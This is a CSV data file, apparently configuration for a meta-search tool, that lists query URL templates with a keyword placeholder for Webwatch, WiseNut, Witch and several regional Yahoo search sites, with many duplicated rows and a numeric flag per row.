"International","Webwatch Be 5 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=6","0"
"International","Webwatch Be 6 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=6&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 6 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=7","0"
"International","Webwatch Be 6 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=7","0"
"International","Webwatch Be 6 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=6&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 6 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=6&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 6 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=7","0"
"International","Webwatch Be 7 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=7&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 7 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=8","0"
"International","Webwatch Be 7 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=8","0"
"International","Webwatch Be 7 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=7&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 7 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=7&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 7 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=8","0"
"International","Webwatch Be 8 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=8&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 8 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=9","0"
"International","Webwatch Be 8 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=9","0"
"International","Webwatch Be 8 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=8&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 8 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=8&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 8 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=9","0"
"International","Webwatch Be 9 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=9&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 9 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=10","0"
"International","Webwatch Be 9 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=10","0"
"International","Webwatch Be 9 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=9&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 9 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=9&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 9 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=10","0"
"International","WiseNut","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=0&c=50","1"
"International","WiseNut","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=0&c=50","0"
"International","WiseNut","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=0&c=50","0"
"International","WiseNut","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=0&c=50","0"
"International","WiseNut","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=0&c=50","0"
"International","WiseNut","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=0&c=50","0"
"International","WiseNut 2 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=1&c=50","1"
"International","WiseNut 2 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=1&c=50","0"
"International","WiseNut 2 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=1&c=50","0"
"International","WiseNut 2 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=1&c=50","0"
"International","WiseNut 2 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=1&c=50","0"
"International","WiseNut 2 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=1&c=50","0"
"International","WiseNut 3 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=2&c=50","1"
"International","WiseNut 3 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=2&c=50","0"
"International","WiseNut 3 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=2&c=50","0"
"International","WiseNut 3 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=2&c=50","0"
"International","WiseNut 3 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=2&c=50","0"
"International","WiseNut 3 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=2&c=50","0"
"International","WiseNut 4 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=3&c=50","1"
"International","WiseNut 4 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=3&c=50","0"
"International","WiseNut 4 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=3&c=50","0"
"International","WiseNut 4 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=3&c=50","0"
"International","WiseNut 4 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=3&c=50","0"
"International","WiseNut 4 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=3&c=50","0"
"International","WiseNut 5 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=4&c=50","1"
"International","WiseNut 5 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=4&c=50","0"
"International","WiseNut 5 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=4&c=50","0"
"International","WiseNut 5 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=4&c=50","0"
"International","WiseNut 5 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=4&c=50","0"
"International","WiseNut 5 (Next 50)","http://www.wisenut.com/search/query.dll?q={SEARCH_KEYWORD}&p=4&c=50","0"
"International","Witch","http://www.witch.de/search-result.php?cn=0&search={SEARCH_KEYWORD}","1"
"International","Witch","http://www.witch.de/search-result.php?cn=0&search={SEARCH_KEYWORD}","0"
"International","Witch","http://www.witch.de/search-result.php?cn=0&search={SEARCH_KEYWORD}","0"
"International","Witch","http://www.witch.de/search-result.php?cn=0&search={SEARCH_KEYWORD}","0"
"International","Witch","http://www.witch.de/search-result.php?cn=0&search={SEARCH_KEYWORD}","0"
"International","Witch","http://www.witch.de/search-result.php?cn=0&search={SEARCH_KEYWORD}","0"
"International","Witch 2 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=10","1"
"International","Witch 2 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=10","0"
"International","Witch 2 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=10","0"
"International","Witch 2 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=10","0"
"International","Witch 2 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=10","0"
"International","Witch 2 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=10","0"
"International","Witch 3 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=20","1"
"International","Witch 3 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=20","0"
"International","Witch 3 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=20","0"
"International","Witch 3 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=20","0"
"International","Witch 3 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=20","0"
"International","Witch 3 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=20","0"
"International","Witch 4 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=30","1"
"International","Witch 4 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=30","0"
"International","Witch 4 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=30","0"
"International","Witch 4 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=30","0"
"International","Witch 4 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=30","0"
"International","Witch 4 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=30","0"
"International","Witch 5 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=40","1"
"International","Witch 5 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=40","0"
"International","Witch 5 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=40","0"
"International","Witch 5 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=40","0"
"International","Witch 5 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=40","0"
"International","Witch 5 (Next 10)","http://www.witch.de/search-result.php?search={SEARCH_KEYWORD}&cn=40","0"
"International","Yahoo","http://search.yahoo.com/search?x=op&va={SEARCH_KEYWORD}&va_vt=any&vst=0&vd=all&fl=0&vf=all&ei=UTF-8&vm=p&n=100","1"
"International","Yahoo","http://search.yahoo.com/search?x=op&va={SEARCH_KEYWORD}&va_vt=any&vst=0&vd=all&fl=0&vf=all&ei=UTF-8&vm=p&n=100","0"
"International","Yahoo","http://search.yahoo.com/search?x=op&va={SEARCH_KEYWORD}&va_vt=any&vst=0&vd=all&fl=0&vf=all&ei=UTF-8&vm=p&n=100","0"
"International","Yahoo","http://search.yahoo.com/search?x=op&va={SEARCH_KEYWORD}&va_vt=any&vst=0&vd=all&fl=0&vf=all&ei=UTF-8&vm=p&n=100","0"
"International","Yahoo","http://search.yahoo.com/search?x=op&va={SEARCH_KEYWORD}&va_vt=any&vst=0&vd=all&fl=0&vf=all&ei=UTF-8&vm=p&n=100","0"
"International","Yahoo","http://search.yahoo.com/search?x=op&va={SEARCH_KEYWORD}&va_vt=any&vst=0&vd=all&fl=0&vf=all&ei=UTF-8&vm=p&n=100","0"
"International","Yahoo AU","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","1"
"International","Yahoo AU","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo AU","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo AU","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo AU","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo AU","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo AU 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=0&hs=1&xargs=0","1"
"International","Yahoo AU 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=0&hs=1&xargs=0","0"
"International","Yahoo AU 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=0&hs=1&xargs=0","0"
"International","Yahoo AU 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=0&hs=1&xargs=0","0"
"International","Yahoo AU 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=0&hs=1&xargs=0","0"
"International","Yahoo AU 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=0&hs=1&xargs=0","0"
"International","Yahoo AU 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","1"
"International","Yahoo AU 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo AU 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo AU 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo AU 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo AU 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo AU 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","1"
"International","Yahoo AU 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo AU 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo AU 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo AU 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo AU 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo AU 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","1"
"International","Yahoo AU 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo AU 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo AU 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo AU 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo AU 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo BR","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}","1"
"International","Yahoo BR","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}","0"
"International","Yahoo BR","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}","0"
"International","Yahoo BR","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}","0"
"International","Yahoo BR","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}","0"
"International","Yahoo BR","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}","0"
"International","Yahoo BR 2 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=21&hc=&hs=","1"
"International","Yahoo BR 2 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=21&hc=&hs=","0"
"International","Yahoo BR 2 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=21&hc=&hs=","0"
"International","Yahoo BR 2 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=21&hc=&hs=","0"
"International","Yahoo BR 2 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=21&hc=&hs=","0"
"International","Yahoo BR 2 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=21&hc=&hs=","0"
"International","Yahoo BR 3 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=41&hc=&hs=","1"
"International","Yahoo BR 3 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=41&hc=&hs=","0"
"International","Yahoo BR 3 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=41&hc=&hs=","0"
"International","Yahoo BR 3 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=41&hc=&hs=","0"
"International","Yahoo BR 3 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=41&hc=&hs=","0"
"International","Yahoo BR 3 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=41&hc=&hs=","0"
"International","Yahoo BR 4 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=61&hc=&hs=","1"
"International","Yahoo BR 4 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=61&hc=&hs=","0"
"International","Yahoo BR 4 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=61&hc=&hs=","0"
"International","Yahoo BR 4 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=61&hc=&hs=","0"
"International","Yahoo BR 4 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=61&hc=&hs=","0"
"International","Yahoo BR 4 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=61&hc=&hs=","0"
"International","Yahoo BR 5 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=81&hc=&hs=","1"
"International","Yahoo BR 5 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=81&hc=&hs=","0"
"International","Yahoo BR 5 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=81&hc=&hs=","0"
"International","Yahoo BR 5 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=81&hc=&hs=","0"
"International","Yahoo BR 5 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=81&hc=&hs=","0"
"International","Yahoo BR 5 (Next 20)","http://br.google.yahoo.com/bin/query_br?p={SEARCH_KEYWORD}&b=81&hc=&hs=","0"
"International","Yahoo CA","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on","1"
"International","Yahoo CA","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on","0"
"International","Yahoo CA","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on","0"
"International","Yahoo CA","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on","0"
"International","Yahoo CA","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on","0"
"International","Yahoo CA","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on","0"
"International","Yahoo CA 2 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=21","1"
"International","Yahoo CA 2 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=21","0"
"International","Yahoo CA 2 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=21","0"
"International","Yahoo CA 2 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=21","0"
"International","Yahoo CA 2 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=21","0"
"International","Yahoo CA 2 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=21","0"
"International","Yahoo CA 3 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=41","1"
"International","Yahoo CA 3 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=41","0"
"International","Yahoo CA 3 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=41","0"
"International","Yahoo CA 3 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=41","0"
"International","Yahoo CA 3 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=41","0"
"International","Yahoo CA 3 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=41","0"
"International","Yahoo CA 4 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=61","1"
"International","Yahoo CA 4 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=61","0"
"International","Yahoo CA 4 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=61","0"
"International","Yahoo CA 4 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=61","0"
"International","Yahoo CA 4 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=61","0"
"International","Yahoo CA 4 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=61","0"
"International","Yahoo CA 5 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=81","1"
"International","Yahoo CA 5 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=81","0"
"International","Yahoo CA 5 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=81","0"
"International","Yahoo CA 5 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=81","0"
"International","Yahoo CA 5 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=81","0"
"International","Yahoo CA 5 (Next 20)","http://ca.search.yahoo.com/search/ca?p={SEARCH_KEYWORD}&%26vc%3D=on&b=81","0"
"International","Yahoo CN","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&u=&hc=0&hs=0","1"
"International","Yahoo CN","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&u=&hc=0&hs=0","0"
"International","Yahoo CN","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&u=&hc=0&hs=0","0"
"International","Yahoo CN","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&u=&hc=0&hs=0","0"
"International","Yahoo CN","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&u=&hc=0&hs=0","0"
"International","Yahoo CN","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&u=&hc=0&hs=0","0"
"International","Yahoo CN 2 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=11","1"
"International","Yahoo CN 2 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=11","0"
"International","Yahoo CN 2 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=11","0"
"International","Yahoo CN 2 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=11","0"
"International","Yahoo CN 2 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=11","0"
"International","Yahoo CN 2 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=11","0"
"International","Yahoo CN 3 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=21","1"
"International","Yahoo CN 3 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=21","0"
"International","Yahoo CN 3 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=21","1"
"International","Yahoo CN 3 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=21","0"
"International","Yahoo CN 3 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=21","0"
"International","Yahoo CN 3 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=21","0"
"International","Yahoo CN 4 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=31","1"
"International","Yahoo CN 4 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo CN 4 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo CN 4 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo CN 4 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo CN 4 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo CN 5 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=41","1"
"International","Yahoo CN 5 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=41","0"
"International","Yahoo CN 5 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=41","0"
"International","Yahoo CN 5 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=41","0"
"International","Yahoo CN 5 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=41","0"
"International","Yahoo CN 5 (Next 20)","http://cn.websearch.yahoo.com/search/web_cn?p={SEARCH_KEYWORD}&b=41","0"
"International","Yahoo DE","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=1&h=W","1"
"International","Yahoo DE","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=1&h=W","0"
"International","Yahoo DE","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=1&h=W","0"
"International","Yahoo DE","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=1&h=W","0"
"International","Yahoo DE","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=1&h=W","0"
"International","Yahoo DE","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=1&h=W","0"
"International","Yahoo DE 2 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=21&h=W&page=2","1"
"International","Yahoo DE 2 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=21&h=W&page=2","0"
"International","Yahoo DE 2 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=21&h=W&page=2","0"
"International","Yahoo DE 2 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=21&h=W&page=2","0"
"International","Yahoo DE 2 (Next 20)","http://de.search.yahoo.com/search/de?p={SEARCH_KEYWORD}&y=y&hc=11&hs=2540000&b=21&h=W&page=2","0"
